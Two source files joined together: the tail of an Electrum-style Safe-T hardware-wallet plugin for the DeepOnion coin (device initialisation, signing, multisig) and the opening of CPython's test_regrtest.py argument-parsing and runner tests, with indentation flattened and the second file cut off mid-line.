def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
@runs_in_hwd_thread
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# Returns the client for a given keystore; can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "DeepOnion"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
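# _make_multisig example: m=2 with three (xpub, deriv) pairs yields a
# 2-of-3 MultisigRedeemScriptType whose signature slots start out empty.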
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from the user,
# because no more than one change address is allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably a segwit input; we don't need this previous txn
return t
tx.deserialize()
t.version = tx.version
t.timestamp = tx.time
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_regrtest.py | """
Tests of regrtest.py.
Note: test_regrtest cannot be run twice in parallel.
"""
import contextlib
import glob
import io
import os.path
import platform
import re
import subprocess
import sys
import sysconfig
import tempfile
import textwrap
import unittest
from test import libregrtest
from test import support
from test.support import os_helper
from test.libregrtest import utils, setup
if not support.has_subprocess_support:
raise unittest.SkipTest("test module requires subprocess")
ROOT_DIR = os.path.join(os.path.dirname(__file__), '..', '..')
ROOT_DIR = os.path.abspath(os.path.normpath(ROOT_DIR))
LOG_PREFIX = r'[0-9]+:[0-9]+:[0-9]+ (?:load avg: [0-9]+\.[0-9]{2} )?'
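# LOG_PREFIX matches timestamps such as "0:00:00 " or
# "0:00:00 load avg: 0.12 " at the start of regrtest log lines.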
TEST_INTERRUPTED = textwrap.dedent("""
from signal import SIGINT, raise_signal
try:
raise_signal(SIGINT)
except ImportError:
import os
os.kill(os.getpid(), SIGINT)
""")
class ParseArgsTestCase(unittest.TestCase):
"""
Test regrtest's argument parsing, function _parse_args().
"""
def checkError(self, args, msg):
with support.captured_stderr() as err, self.assertRaises(SystemExit):
libregrtest._parse_args(args)
self.assertIn(msg, err.getvalue())
def test_help(self):
for opt in '-h', '--help':
with self.subTest(opt=opt):
with support.captured_stdout() as out, \
self.assertRaises(SystemExit):
libregrtest._parse_args([opt])
self.assertIn('Run Python regression tests.', out.getvalue())
def test_timeout(self):
ns = libregrtest._parse_args(['--timeout', '4.2'])
self.assertEqual(ns.timeout, 4.2)
self.checkError(['--timeout'], 'expected one argument')
self.checkError(['--timeout', 'foo'], 'invalid float value')
def test_wait(self):
ns = libregrtest._parse_args(['--wait'])
self.assertTrue(ns.wait)
def test_worker_args(self):
ns = libregrtest._parse_args(['--worker-args', '[[], {}]'])
self.assertEqual(ns.worker_args, '[[], {}]')
self.checkError(['--worker-args'], 'expected one argument')
def test_start(self):
for opt in '-S', '--start':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.start, 'foo')
self.checkError([opt], 'expected one argument')
def test_verbose(self):
ns = libregrtest._parse_args(['-v'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['-vvv'])
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args(['--verbose'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['--verbose'] * 3)
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args([])
self.assertEqual(ns.verbose, 0)
def test_verbose2(self):
for opt in '-w', '--verbose2':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose2)
def test_verbose3(self):
for opt in '-W', '--verbose3':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose3)
def test_quiet(self):
for opt in '-q', '--quiet':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
def test_slowest(self):
for opt in '-o', '--slowest':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.print_slow)
def test_header(self):
ns = libregrtest._parse_args(['--header'])
self.assertTrue(ns.header)
ns = libregrtest._parse_args(['--verbose'])
self.assertTrue(ns.header)
def test_randomize(self):
for opt in '-r', '--randomize':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.randomize)
def test_randseed(self):
ns = libregrtest._parse_args(['--randseed', '12345'])
self.assertEqual(ns.random_seed, 12345)
self.assertTrue(ns.randomize)
self.checkError(['--randseed'], 'expected one argument')
self.checkError(['--randseed', 'foo'], 'invalid int value')
def test_fromfile(self):
for opt in '-f', '--fromfile':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.fromfile, 'foo')
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo', '-s'], "don't go together")
def test_exclude(self):
for opt in '-x', '--exclude':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.exclude)
def test_single(self):
for opt in '-s', '--single':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.single)
self.checkError([opt, '-f', 'foo'], "don't go together")
def test_ignore(self):
for opt in '-i', '--ignore':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.ignore_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--ignorefile', filename])
self.assertEqual(ns.ignore_tests,
['matchfile1', 'matchfile2'])
def test_match(self):
for opt in '-m', '--match':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.match_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
ns = libregrtest._parse_args(['-m', 'pattern1',
'-m', 'pattern2'])
self.assertEqual(ns.match_tests, ['pattern1', 'pattern2'])
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--matchfile', filename])
self.assertEqual(ns.match_tests,
['match', 'matchfile1', 'matchfile2'])
def test_failfast(self):
for opt in '-G', '--failfast':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '-v'])
self.assertTrue(ns.failfast)
ns = libregrtest._parse_args([opt, '-W'])
self.assertTrue(ns.failfast)
self.checkError([opt], '-G/--failfast needs either -v or -W')
def test_use(self):
for opt in '-u', '--use':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'gui,network'])
self.assertEqual(ns.use_resources, ['gui', 'network'])
ns = libregrtest._parse_args([opt, 'gui,none,network'])
self.assertEqual(ns.use_resources, ['network'])
expected = list(libregrtest.ALL_RESOURCES)
expected.remove('gui')
ns = libregrtest._parse_args([opt, 'all,-gui'])
self.assertEqual(ns.use_resources, expected)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid resource')
# all + a resource not part of "all"
ns = libregrtest._parse_args([opt, 'all,tzdata'])
self.assertEqual(ns.use_resources,
list(libregrtest.ALL_RESOURCES) + ['tzdata'])
# test another resource which is not part of "all"
ns = libregrtest._parse_args([opt, 'extralargefile'])
self.assertEqual(ns.use_resources, ['extralargefile'])
def test_memlimit(self):
for opt in '-M', '--memlimit':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '4G'])
self.assertEqual(ns.memlimit, '4G')
self.checkError([opt], 'expected one argument')
def test_testdir(self):
ns = libregrtest._parse_args(['--testdir', 'foo'])
self.assertEqual(ns.testdir, os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError(['--testdir'], 'expected one argument')
def test_runleaks(self):
for opt in '-L', '--runleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.runleaks)
def test_huntrleaks(self):
for opt in '-R', '--huntrleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, ':'])
self.assertEqual(ns.huntrleaks, (5, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:'])
self.assertEqual(ns.huntrleaks, (6, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, ':3'])
self.assertEqual(ns.huntrleaks, (5, 3, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:3:leaks.log'])
self.assertEqual(ns.huntrleaks, (6, 3, 'leaks.log'))
self.checkError([opt], 'expected one argument')
self.checkError([opt, '6'],
'needs 2 or 3 colon-separated arguments')
self.checkError([opt, 'foo:'], 'invalid huntrleaks value')
self.checkError([opt, '6:foo'], 'invalid huntrleaks value')
def test_multiprocess(self):
for opt in '-j', '--multiprocess':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '2'])
self.assertEqual(ns.use_mp, 2)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
self.checkError([opt, '2', '-T'], "don't go together")
self.checkError([opt, '0', '-T'], "don't go together")
def test_coverage(self):
for opt in '-T', '--coverage':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.trace)
def test_coverdir(self):
for opt in '-D', '--coverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.coverdir,
os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError([opt], 'expected one argument')
def test_nocoverdir(self):
for opt in '-N', '--nocoverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertIsNone(ns.coverdir)
def test_threshold(self):
for opt in '-t', '--threshold':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '1000'])
self.assertEqual(ns.threshold, 1000)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
def test_nowindows(self):
for opt in '-n', '--nowindows':
with self.subTest(opt=opt):
with contextlib.redirect_stderr(io.StringIO()) as stderr:
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.nowindows)
err = stderr.getvalue()
self.assertIn('the --nowindows (-n) option is deprecated', err)
def test_forever(self):
for opt in '-F', '--forever':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.forever)
def test_unrecognized_argument(self):
self.checkError(['--xxx'], 'usage:')
def test_long_option__partial(self):
ns = libregrtest._parse_args(['--qui'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
def test_two_options(self):
ns = libregrtest._parse_args(['--quiet', '--exclude'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertTrue(ns.exclude)
def test_option_with_empty_string_value(self):
ns = libregrtest._parse_args(['--start', ''])
self.assertEqual(ns.start, '')
def test_arg(self):
ns = libregrtest._parse_args(['foo'])
self.assertEqual(ns.args, ['foo'])
def test_option_and_arg(self):
ns = libregrtest._parse_args(['--quiet', 'foo'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertEqual(ns.args, ['foo'])
def test_arg_option_arg(self):
ns = libregrtest._parse_args(['test_unaryop', '-v', 'test_binop'])
self.assertEqual(ns.verbose, 1)
self.assertEqual(ns.args, ['test_unaryop', 'test_binop'])
def test_unknown_option(self):
self.checkError(['--unknown-option'],
'unrecognized arguments: --unknown-option')
class BaseTestCase(unittest.TestCase):
TEST_UNIQUE_ID = 1
TESTNAME_PREFIX = 'test_regrtest_'
TESTNAME_REGEX = r'test_[a-zA-Z0-9_]+'
def setUp(self):
self.testdir = os.path.realpath(os.path.dirname(__file__))
self.tmptestdir = tempfile.mkdtemp()
self.addCleanup(os_helper.rmtree, self.tmptestdir)
def create_test(self, name=None, code=None):
if not name:
name = 'noop%s' % BaseTestCase.TEST_UNIQUE_ID
BaseTestCase.TEST_UNIQUE_ID += 1
if code is None:
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_empty_test(self):
pass
""")
# test_regrtest cannot be run twice in parallel because
# of setUp() and create_test()
name = self.TESTNAME_PREFIX + name
path = os.path.join(self.tmptestdir, name + '.py')
self.addCleanup(os_helper.unlink, path)
# Use 'x' mode to ensure that we do not overwrite existing tests
try:
with open(path, 'x', encoding='utf-8') as fp:
fp.write(code)
except PermissionError as exc:
if not sysconfig.is_python_build():
self.skipTest("cannot write %s: %s" % (path, exc))
raise
return name
def regex_search(self, regex, output):
match = re.search(regex, output, re.MULTILINE)
if not match:
self.fail("%r not found in %r" % (regex, output))
return match
def check_line(self, output, regex):
regex = re.compile(r'^' + regex, re.MULTILINE)
self.assertRegex(output, regex)
def parse_executed_tests(self, output):
regex = (r'^%s\[ *[0-9]+(?:/ *[0-9]+)*\] (%s)'
% (LOG_PREFIX, self.TESTNAME_REGEX))
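# e.g. matches "0:00:00 [ 1/ 4] test_regrtest_noop1" and captures the test name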
parser = re.finditer(regex, output, re.MULTILINE)
return list(match.group(1) for match in parser)
def check_executed_tests(self, output, tests, skipped=(), failed=(),
env_changed=(), omitted=(),
rerun={}, no_test_ran=(),
randomize=False, interrupted=False,
fail_env_changed=False):
if isinstance(tests, str):
tests = [tests]
if isinstance(skipped, str):
skipped = [skipped]
if isinstance(failed, str):
failed = [failed]
if isinstance(env_changed, str):
env_changed = [env_changed]
if isinstance(omitted, str):
omitted = [omitted]
if isinstance(no_test_ran, str):
no_test_ran = [no_test_ran]
executed = self.parse_executed_tests(output)
if randomize:
self.assertEqual(set(executed), set(tests), output)
else:
self.assertEqual(executed, tests, output)
def plural(count):
return 's' if count != 1 else ''
def list_regex(line_format, tests):
count = len(tests)
names = ' '.join(sorted(tests))
regex = line_format % (count, plural(count))
regex = r'%s:\n %s$' % (regex, names)
return regex
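# e.g. list_regex('%s test%s failed', ['t_a', 't_b']) gives
# r'2 tests failed:\n t_a t_b$'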
if skipped:
regex = list_regex('%s test%s skipped', skipped)
self.check_line(output, regex)
if failed:
regex = list_regex('%s test%s failed', failed)
self.check_line(output, regex)
if env_changed:
regex = list_regex('%s test%s altered the execution environment',
env_changed)
self.check_line(output, regex)
if omitted:
regex = list_regex('%s test%s omitted', omitted)
self.check_line(output, regex)
if rerun:
regex = list_regex('%s re-run test%s', rerun.keys())
self.check_line(output, regex)
regex = LOG_PREFIX + r"Re-running failed tests in verbose mode"
self.check_line(output, regex)
for name, match in rerun.items():
regex = LOG_PREFIX + f"Re-running {name} in verbose mode \\(matching: {match}\\)"
self.check_line(output, regex)
if no_test_ran:
regex = list_regex('%s test%s run no tests', no_test_ran)
self.check_line(output, regex)
good = (len(tests) - len(skipped) - len(failed)
- len(omitted) - len(env_changed) - len(no_test_ran))
if good:
regex = r'%s test%s OK\.$' % (good, plural(good))
if not skipped and not failed and good > 1:
regex = 'All %s' % regex
self.check_line(output, regex)
if interrupted:
self.check_line(output, 'Test suite interrupted by signal SIGINT.')
result = []
if failed:
result.append('FAILURE')
elif fail_env_changed and env_changed:
result.append('ENV CHANGED')
if interrupted:
result.append('INTERRUPTED')
if not any((good, result, failed, interrupted, skipped,
env_changed, fail_env_changed)):
result.append("NO TEST RUN")
elif not result:
result.append('SUCCESS')
result = ', '.join(result)
if rerun:
self.check_line(output, 'Tests result: FAILURE')
result = 'FAILURE then %s' % result
self.check_line(output, 'Tests result: %s' % result)
def parse_random_seed(self, output):
match = self.regex_search(r'Using random seed ([0-9]+)', output)
randseed = int(match.group(1))
self.assertTrue(0 <= randseed <= 10000000, randseed)
return randseed
def run_command(self, args, input=None, exitcode=0, **kw):
if not input:
input = ''
if 'stderr' not in kw:
kw['stderr'] = subprocess.STDOUT
proc = subprocess.run(args,
universal_newlines=True,
input=input,
stdout=subprocess.PIPE,
**kw)
if proc.returncode != exitcode:
msg = ("Command %s failed with exit code %s\n"
"\n"
"stdout:\n"
"---\n"
"%s\n"
"---\n"
% (str(args), proc.returncode, proc.stdout))
if proc.stderr:
msg += ("\n"
"stderr:\n"
"---\n"
"%s"
"---\n"
% proc.stderr)
self.fail(msg)
return proc
def run_python(self, args, **kw):
args = [sys.executable, '-X', 'faulthandler', '-I', *args]
proc = self.run_command(args, **kw)
return proc.stdout
class CheckActualTests(BaseTestCase):
def test_finds_expected_number_of_tests(self):
"""
Check that regrtest appears to find the expected set of tests.
"""
args = ['-Wd', '-E', '-bb', '-m', 'test.regrtest', '--list-tests']
output = self.run_python(args)
rough_number_of_tests_found = len(output.splitlines())
actual_testsuite_glob = os.path.join(glob.escape(os.path.dirname(__file__)),
'test*.py')
rough_counted_test_py_files = len(glob.glob(actual_testsuite_glob))
# We're not trying to duplicate test finding logic in here,
# just give a rough estimate of how many there should be and
# be near that. This is a regression test to prevent mishaps
# such as https://bugs.python.org/issue37667 in the future.
# If you need to change the values in here during some
# mythical future test suite reorganization, don't go
# overboard with logic and keep that goal in mind.
self.assertGreater(rough_number_of_tests_found,
rough_counted_test_py_files*9//10,
msg='Unexpectedly low number of tests found in:\n'
f'{", ".join(output.splitlines())}')
class ProgramsTestCase(BaseTestCase):
"""
Test various ways to run the Python test suite. Use options close
to options used on the buildbot.
"""
NTEST = 4
def setUp(self):
super().setUp()
# Create NTEST tests doing nothing
self.tests = [self.create_test() for index in range(self.NTEST)]
self.python_args = ['-Wd', '-E', '-bb']
self.regrtest_args = ['-uall', '-rwW',
'--testdir=%s' % self.tmptestdir]
self.regrtest_args.extend(('--timeout', '3600', '-j4'))
if sys.platform == 'win32':
self.regrtest_args.append('-n')
def check_output(self, output):
self.parse_random_seed(output)
self.check_executed_tests(output, self.tests, randomize=True)
def run_tests(self, args):
output = self.run_python(args)
self.check_output(output)
def test_script_regrtest(self):
# Lib/test/regrtest.py
script = os.path.join(self.testdir, 'regrtest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_test(self):
# -m test
args = [*self.python_args, '-m', 'test',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_regrtest(self):
# -m test.regrtest
args = [*self.python_args, '-m', 'test.regrtest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_autotest(self):
# -m test.autotest
args = [*self.python_args, '-m', 'test.autotest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_from_test_autotest(self):
# from test import autotest
code = 'from test import autotest'
args = [*self.python_args, '-c', code,
